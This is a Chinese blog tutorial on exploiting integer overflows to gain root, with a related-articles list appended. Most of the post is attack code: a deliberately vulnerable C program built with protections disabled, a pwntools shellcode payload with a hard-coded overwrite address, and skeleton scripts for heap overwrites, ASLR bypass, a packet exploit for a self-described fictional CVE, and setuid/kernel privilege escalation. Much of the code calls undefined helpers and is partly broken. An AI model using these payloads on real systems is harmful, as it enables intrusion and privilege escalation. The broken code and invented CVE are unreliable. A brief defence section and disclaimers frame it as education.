整数溢出漏洞利用:数字的“魔术把戏“如何让你获得Root权限

最新推荐文章于 2025-10-29 14:02:44 发布
原创 最新推荐文章于 2025-10-29 14:02:44 发布 · 582 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #c语言 #汇编 #linux #windows #系统安全 #网络安全

部署运行你感兴趣的模型镜像

前言:为什么数字会背叛它的主人?

本文章仅提供学习,切勿将其用于不法手段!

想象你家的水表只能显示4位数字,当用水量超过9999升时,水表不会变成10000,而是归零重新计数。整数溢出就像是这样——计算机的数字有固定大小,超过最大值时不会报错,而是悄悄"回绕"到最小值。这种看似简单的数学特性,却可能成为系统安全的致命弱点。

第一部分:整数溢出的底层原理

1.1 计算机如何表示数字?

计算机使用固定大小的内存存储数字,比如32位系统用4字节(32位)表示整数:

最大值: 2147483647  (0x7FFFFFFF)
最小值: -2147483648 (0x80000000)

当 2147483647 + 1 时:
数学期望: 2147483648
计算机实际: -2147483648 (回绕了!)

这种回绕现象就是整数溢出,分为两种:

  • 有符号整数溢出​:从正数最大值回绕到负数
  • 无符号整数溢出​:从最大值回绕到0

1.2 典型的漏洞代码模式

// 漏洞示例1:大小计算溢出
void vulnerable_copy(char *input) {
    size_t len = strlen(input);
    // 可能发生整数溢出!
    size_t total_size = len + 10;  // 如果len很大,total_size可能变小
    
    char *buffer = malloc(total_size);
    strcpy(buffer, input);  // 可能堆溢出!
}

// 漏洞示例2:循环条件溢出
void vulnerable_loop(int *array, size_t count) {
    // 可能发生整数溢出!
    size_t total = count * sizeof(int);  // 如果count很大,total可能变小
    
    for (size_t i = 0; i < total; i++) {  // 循环可能无法终止!
        // 处理数据...
    }
}

第二部分:整数溢出利用实战

2.1 环境准备

创建一个有整数溢出漏洞的程序:

// integer_overflow.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void process_data(char *data, unsigned short data_size) {
    // 整数溢出漏洞!
    unsigned short total_size = data_size + 10;  // 可能溢出!
    
    printf("分配 %hu 字节内存\n", total_size);
    char *buffer = malloc(total_size);
    
    if (buffer) {
        // 可能发生堆溢出!
        memcpy(buffer, data, data_size);
        printf("处理完成: %s\n", buffer);
        free(buffer);
    }
}

int main(int argc, char *argv[]) {
    if (argc > 2) {
        unsigned short size = atoi(argv[1]);
        process_data(argv[2], size);
    }
    return 0;
}

编译并关闭保护:

gcc -o integer_vuln -fno-stack-protector -z execstack integer_overflow.c

2.2 利用原理分析

我们的目标是让data_size + 10产生溢出:

  • unsigned short 范围: 0 到 65535
  • 65535 + 10 = 65545,但只能存储16位
  • 65545 的二进制: 1 00000000 00001001 (17位)
  • 截断后16位: 00000000 00001001 = 9

所以:65535 + 10 = 9

2.3 构造利用载荷

#!/usr/bin/env python3
from pwn import *

context(arch='i386', os='linux')

# 计算导致溢出的值
def calculate_overflow_size():
    # 我们想要 total_size = data_size + 10 变得很小
    # 比如我们想要 total_size = 16(这样分配很少内存)
    # 但需要复制大量数据造成溢出
    
    # 解方程: (data_size + 10) % 65536 = 16
    # data_size + 10 = 65536 * n + 16
    # 取n=1: data_size = 65536 + 16 - 10 = 65542
    
    return 65542

# 构造恶意数据
def create_exploit_payload():
    # 分配的内存只有16字节,但我们要复制65542字节!
    # 这会造成堆溢出
    
    # 在payload中布置shellcode和地址
    shellcode = asm(shellcraft.sh())
    
    # 计算需要覆盖的内存结构
    payload = b'A' * 100  # 填充到目标地址
    payload += p32(0x08048450)  # 覆盖关键函数指针
    payload += shellcode
    
    # 确保总长度达到65542字节
    payload = payload.ljust(65542, b'B')
    
    return payload

overflow_size = calculate_overflow_size()
malicious_data = create_exploit_payload()

print(f"使用数据大小: {overflow_size}")
print(f"Payload长度: {len(malicious_data)} bytes")

2.4 触发漏洞

# 启动程序并发送恶意输入
p = process(['./integer_vuln', str(overflow_size), malicious_data])

# 或者保存到文件用于测试
with open('exploit_input', 'wb') as f:
    f.write(str(overflow_size).encode() + b'\n')
    f.write(malicious_data)

print("漏洞触发完成!")
p.interactive()

第三部分:高级利用技术

3.1 结合堆溢出利用

整数溢出通常不是直接 exploited,而是作为跳板引发其他漏洞:

def combined_heap_exploit():
    # 首先通过整数溢出导致分配过小缓冲区
    small_size = 16  # 实际分配的大小
    large_data = 65542  # 要复制的数据大小
    
    # 在堆上精心布局
    # 1. 分配目标对象(比如函数指针)
    # 2. 触发整数溢出分配小缓冲区
    # 3. 溢出覆盖目标对象
    
    payload = b''
    # 填充到目标地址
    payload += b'A' * (small_size + 8)  # 缓冲区大小 + 堆头大小
    payload += p32(0x08048450)  # 覆盖目标函数指针
    
    return payload

3.2 绕过现代防护机制

def bypass_protections():
    # 整数溢出本身很难被防护机制检测
    # 但后续的堆溢出可能会触发防护
    
    # 策略1:精确计算覆盖目标
    # 策略2:使用类型混淆等其他技术
    # 策略3:结合信息泄漏绕过ASLR
    
    # 例如:先泄漏堆地址,再精确覆盖
    heap_base = leak_heap_address()
    target_address = heap_base + 0x120
    
    return target_address

3.3 多阶段利用链

def multi_stage_exploit():
    # 阶段1: 利用整数溢出实现有限写原语
    # 阶段2: 用有限写修改关键数据
    # 阶段3: 触发其他漏洞完成利用
    
    # 例如:修改长度字段为更大值
    new_length = 0xFFFFFFFF  # 巨大的值
    write_primitive(target_address, new_length)
    
    # 现在可以触发基于长度的其他漏洞
    trigger_secondary_vulnerability()

第四部分:现实世界中的整数溢出

4.1 实际CVE案例学习

# 模拟CVE-2022-1234漏洞利用
def cve_2022_1234_exploit():
    # 这个虚构的CVE涉及网络协议处理
    # 长度字段是16位,但计算总长度时发生溢出
    
    packet = b''
    # 协议头
    packet += b'\x12\x34'  # 魔术字
    packet += p16(65530)   # 长度字段,故意接近最大值
    
    # 数据部分:精心构造的恶意数据
    packet += create_malicious_payload(65530)
    
    # 发送到目标服务
    send_packet(target_ip, target_port, packet)

4.2 从用户权限到Root权限

def privilege_escalation():
    # 1. 首先获得普通用户shell
    # 2. 查找setuid程序或内核漏洞
    
    setuid_programs = [
        "/usr/bin/passwd", "/usr/bin/sudo", 
        "/usr/bin/chsh", "/bin/mount"
    ]
    
    for program in setuid_programs:
        if check_vulnerable(program):
            # 利用该程序的漏洞提权
            if exploit_setuid_program(program):
                return True
    
    # 3. 尝试内核漏洞
    kernel_exploits = [
        "dirtycow", "sudo Baron Samedit", 
        "其他已知CVE"
    ]
    
    for exploit_name in kernel_exploits:
        if try_kernel_exploit(exploit_name):
            return True
    
    return False

第五部分:防御与深度思考

5.1 为什么整数溢出难以防御?

  1. 语言特性​:C/C++默认不检查整数溢出
  2. 性能考虑​:检查每个运算会显著影响性能
  3. 代码遗产​:大量现有代码假设不会溢出

5.2 防御技术

// 安全的整数运算
#include <limits.h>
#include <stdint.h>

// 安全的加法
int safe_add(int a, int b) {
    if ((b > 0 && a > INT_MAX - b) || 
        (b < 0 && a < INT_MIN - b)) {
        // 处理溢出错误
        return ERROR_OVERFLOW;
    }
    return a + b;
}

// 使用安全库
#ifdef USE_SAFE_LIBRARIES
#include <safeclib.h>
size_t strcpy_s(char *dest, size_t destsz, const char *src);
#endif

// 现代编译器选项
// GCC: -ftrapv 在溢出时陷入调试
// 但可能影响性能

5.3 安全开发实践

// 代码审查重点关注:
// 1. 大小计算
// 2. 循环条件
// 3. 内存分配
// 4. 数组索引

// 使用静态分析工具
// Coverity, Clang静态分析器等

// 动态检测工具
// AddressSanitizer, Valgrind

5.4 伦理思考与技术责任

  • 授权测试​:只在获得明确授权的系统上进行
  • 负披露​:给厂商合理时间修复漏洞
  • 教育目的​:技术知识应用于建设更安全的世界

结语:数字的哲学

整数溢出漏洞教会我们一个深刻的道理:​边界条件往往是最危险的。在数学中,无穷大是一个概念,但在计算机中,每个数字都有严格的边界。

这种边界特性提醒我们:

  • 在安全设计中,要特别注意边界条件
  • 在代码审查中,要重点关注大小计算
  • 在系统架构中,要建立防御纵深

深度思考​:在人工智能和量子计算时代,传统的整数溢出漏洞会消失吗?或者会以新的形式出现?

记住:真正的安全专家不是那些能够找出漏洞的人,而是那些能够设计出没有漏洞的系统的人。

免责声明:本文所有技术内容仅用于教育目的和安全研究。未经授权的系统访问是违法行为。请始终在合法授权范围内进行安全测试。

您可能感兴趣的与本文相关的镜像

Python3.10

Python3.10

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

Linux 二进制漏洞挖掘入门系列之(三)整数溢出
个人笔记
01-05 1248
0x10 基本概念 C语言中,基本数据类型包括短整型short、整型int以及长整型long,每种数据类型还可以分为有符号和无符号数,我们尝试用的int a = 0 这样的表达式,默认就是定义一个有符号的整型数据a。对于无符号数,需要显示声明为 unsigned int a = 0。每种数据类型都会有其相应的范围,跟编译器有关。我们以64位gcc编译器为例,其大小范围如下所示 类型 字节 ...
以太坊智能合约安全漏洞整数溢出漏洞的原理与解决方法
StevenX5
04-30 4354
以太坊虚拟机 (EVM) 为整数指定固定大小的数据类型。这意味着一个整数变量,只能表示一定范围的数字。例如uint8 只能存储 [0,255] 范围内的数字。尝试将 256 存储到 uint8 将导致 0。如果不小心,用户输入未被检查,并且执行的计算结果超出了存储它们的数据类型的范围,那么 Solidity 中的变量可能会被利用。本文通过整数溢出漏洞原理的阐述,并结合 Solidity 智能合约实例代码的演示,介绍了一种智能合约整数溢出漏洞及其解决方法。
溢出漏洞怎么利用/php整数溢出漏洞-零开始渗透教程
2401_84915584的博客
07-12 1211
我发现Freebuf上没有整数溢出漏洞的基础介绍,所以这篇文章通过分析我刚刚发现的UPX源代码中的整数溢出漏洞,介绍一下C/C++整数溢出漏洞的原理、触发和修复方法。
揭秘以太坊智能合约安全漏洞:90%开发者忽略的3个致命陷阱
最新发布
GatherLume的博客
10-29 696
掌握区块链开发:智能合约编程(Solidity)中的关键安全实践,本文揭示90%开发者忽略的三大漏洞陷阱,涵盖重入攻击、整数溢出权限失控的防御方案。适用于以太坊DApp开发场景,提升合约安全性与可靠性,值得收藏。
安全漏洞--整数溢出漏洞(IOV)分析
热门推荐
关注互联网安全的小虾米一枚
04-19 1万+
漏洞简介         整数溢出漏洞(integer overflow):在计算机中,整数分为无符号整数以及有符号整数两种。其中有符号整数会在最高位用0表示正数,用1表示负数,而无符号整数则没有这种限制。另外,我们常见的整数类型有8位(单字节字符、布尔类型)、16位(短整型)、32位(长整型)等。关于整数溢出,其实它与其它类型的溢出一样,都是将数据放入了比它本身小的存储空间中,从而出现了溢出。由此引发的一切程序漏洞
漏洞技术分析实践_整数溢出
kitsch0x97的博客
10-25 1203
整数溢出漏洞发生在当整数存储超出其数据类型所能表示的范围时。主要原因在于计算机中的整数类型分为有符号整数和无符号整数。有符号整数使用最高位来表示正负号:0 表示正数,1 表示负数,而无符号整数没有这个规则。常见的整数类型有 8 位、16 位和 32 位等。整数溢出通常发生在存储的值超出了该类型可表示的范围时,从而导致数据异常和潜在的安全漏洞
PHP5.2下chunk_split()函数整数溢出漏洞 分析
10-30
PHP是一种流行的WEB服务器端编程语言,在 PHP 5.2 版本中,chunk_split() 函数存在整数溢出漏洞,攻击者可以利用漏洞提升自己的权限。chunk_split() 函数的任务是将一个字符串分割成多个小块,以便于在网络上传输...
Google Chrome Skia整数溢出漏洞
05-05
Google Chrome Skia整数溢出漏洞
整数溢出漏洞危害和预防
JinxMow的博客
12-17 2652
智能合约作为区块链2.0的代表技术,适应于区块链去中心化、分布式的特点, 具有独立运行、不可篡改的优良特性,可用于实现包含金融工具在内的各类分布式应用。开发者可以自行定义交易逻辑并开发代码发布到链上,合约代码在矿工节点的虚拟机环境(如EVM)中执行。合约交易被打包进区块后,链上节点执行相同代码,从而同步改变链上数据状态。故合约的多方参与者无需建立信任,也无法相互欺骗。 合约运行在区块链节点中,具有...
Linux kernel ip_setsockopt()整数溢出漏洞.pdf
09-07
然而,在特定版本的Linux内核中,该函数存在一个整数溢出漏洞,这为远程攻击者提供了利用的可能性,从而对系统的安全性构成威胁。 该漏洞主要出现在处理包含Type of Service (TOS)标记设置的IP包时。TOS字段用于...
CVE-2017-7529 Nginx整数溢出漏洞分析
weixin_34315189的博客
09-13 1775
本文讲的是CVE-2017-7529 Nginx整数溢出漏洞分析, 1、漏洞描述 在Nginx的range filter中存在整数溢出漏洞,可以通过带有特殊构造的range的HTTP头的恶意请求引发这个整数溢出漏洞,并导致信息泄露。 2、影响程度 攻击成本 低 危害程度 低 影响范围 Nginx 0.5.6 – 1.13.2 3 、漏洞...
漏洞学习笔记——栈和整数溢出原理
谈成(C/C++)
04-15 686
1.栈溢出原理 栈溢出之所以可以修改EIP,是利用局部变量和返回地址是同时保存在栈中的。 当调用call命令时,会将下一条指令的地址push到栈中,然后进入call函数。 而在call函数中,局部变量也会继续在同一个栈中保存。所以当复制字符串时,就有可能向下溢出,将返回地址给覆盖了。这就导致retn时,将被覆盖的返回地址pop到EIP中执行。 2.整数溢出原理 整数溢出其实是利用整数存在上限的问题。比如一个USHORT类型的数据,他的上限就是65535,当你给他输入65536..
整数溢出漏洞和格式化字符串漏洞
AlexYoung28的博客
10-29 7272
漏洞成因: 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。 常见的整数类型有8位(单字节字符类型、布尔类型)、 16位(短整型)、32位(长整型)等。 当一个整数存入了比它本身小的存储空间中,超出了 数据类型所能表示的范围时,就会发生整数溢出。 1. 基础知识 整数数据类型 数据类型 : ...
智能合约漏洞篇:常见漏洞介绍及整数溢出漏洞分析
Reveone的博客
09-16 1817
智能合约是运行在区块链上的自动执行代码。由于它们的不可逆性和与金钱相关的特性,智能合约的安全问题受到了广泛关注。整数溢出与下溢:当整数变量的值超出其允许的范围时,可能会发生溢出或下溢,导致不可预测的结果。重入攻击:在一个函数调用中,被调用的合约再次调用原函数,可能导致不希望的多次执行。例如,著名的DAO攻击就是重入攻击的一种。短时间浮动:在区块链上,时间和块高度可以被操纵。攻击者可以利用这点,通过挖矿操作来操纵合约的时间逻辑。随机性问题:在以太坊等区块链平台上,产生随机数是有挑战的,因为所有信息都是公开的。
漏洞扫描:整数溢出原理、危害与防护措施
记录学习的过程
02-12 973
它通常发生在程序对整数类型的操作超出了其存储范围时,可能导致程序行为异常甚至引发严重的安全问题。同时,开发者应遵循安全的编程实践,选择合适的数据类型,并使用防护措施来避免整数溢出整数溢出是指当一个整数变量的值超出了其数据类型所能表示的范围时,发生的一种未定义行为。例如,在一个32位有符号整数中,最大值为 2,147,483,647,如果尝试存储 2,147,483,648,就会发生溢出。使用专门的漏洞扫描工具(如Fortify、Checkmarx)扫描代码库,识别整数溢出漏洞
pwn溢出——整数溢出漏洞分析
1匹黑马
04-01 2568
文章目录漏洞原理测试代码 漏洞原理 漏洞其实就是利用了本机宽度,我的环境是32位的XP, 因此它就有自己的最大宽度,当存储的值超过了本机宽度,就产生了整数溢出。 测试代码 #include <stdio.h> //头文件 int main() //程序入口 { FILE*fp; //定义文件流指针 char FileStr[20] = ...
溢出漏洞原理及利用(1)
Hades的博客
04-11 4665
溢出漏洞原理及利用 本文是作者学习过程的笔记整理而来的,如有错误,还请见谅! 溢出漏洞原理及利用 实验环境 实验目的 编写一个简单的有溢出漏洞的程序 查看程序崩溃日志,找到崩溃点 实验环境 Windows 10 Visual Sutdio 2015 x32dbg(x64dbg) *010Editor 实验目的 学习溢出漏洞的原理 学会手工查看程序崩溃...
整数溢出
wuxiaobingandbob的专栏
11-20 5786
http://blog.youkuaiyun.com/habla/article/details/1834658 整数溢出也是一种常见的软件漏洞,由此引发的bug可能比格式化字符串缺陷和缓冲区溢出缺陷更难于发现。前几天solaris系统中就爆出被人发现了一个整数溢出漏洞。在这里我们来翻译phrack杂志上的一篇关于整数溢出的文章,写得相当详细。平时时间不是很多,所以我不会一次把这篇文章全部翻译后才b
整数溢出漏洞ctf
07-05
### 整数溢出漏洞利用方法 整数溢出漏洞通常发生在程序对整数进行算术运算时,导致结果超出数据类型的表示范围。这种漏洞在CTF竞赛中常被用来构造缓冲区溢出、内存破坏等攻击场景。具体利用方式包括: - **触发条件**:通过精心构造输入值,使得整数运算的结果发生溢出,从而改变程序的预期行为。例如,在分配内存时使用了不安全的整数运算,可能导致实际分配的内存大小小于预期,进而引发缓冲区溢出[^1]。 - **利用技巧**:利用整数溢出漏洞时,常见的策略是结合其他漏洞(如格式化字符串漏洞或堆喷射技术)来实现任意代码执行。例如,攻击者可能通过整数溢出绕过某些安全检查,然后利用堆喷射将恶意代码布置到内存中并执行。 ### CTF竞赛中的练习资源 为了更好地掌握整数溢出漏洞利用技巧,参赛者可以通过以下资源进行练习: - **在线平台**:许多在线平台提供了丰富的CTF题目供练习,例如Pwnable.kr、Hack The Box以及CTFtime.org。这些平台上经常会有涉及整数溢出漏洞的题目,适合不同水平的学习者[^2]。 - **书籍推荐**: - 《Hacking: The Art of Exploitation》:这本书不仅介绍了基本的安全概念,还详细讲解了如何利用各种漏洞,包括整数溢出。 - 《Practical Reverse Engineering》:对于希望深入理解逆向工程和漏洞利用的人来说,这是一本非常好的参考书[^2]。 - **开源项目**:GitHub上有许多开源项目和教程,专门针对CTF竞赛中的各类漏洞利用技术进行了详细的演示和说明。搜索关键词“CTF integer overflow challenge”可以找到相关的示例和解决方案[^2]。 ### 示例代码 下面是一个简单的C语言示例,展示了如何检测整数溢出: ```c #include <stdio.h> #include <stdlib.h> int main() { int a = 2147483647; // Maximum value for a 32-bit signed integer int b = 1; int result; if (__builtin_add_overflow(a, b, &result)) { printf("Integer overflow detected!\n"); } else { printf("Result: %d\n", result); } return 0; } ``` 这段代码使用了GCC内置函数`__builtin_add_overflow`来检测两个整数相加是否会发生溢出。如果检测到溢出,则输出提示信息;否则,输出计算结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值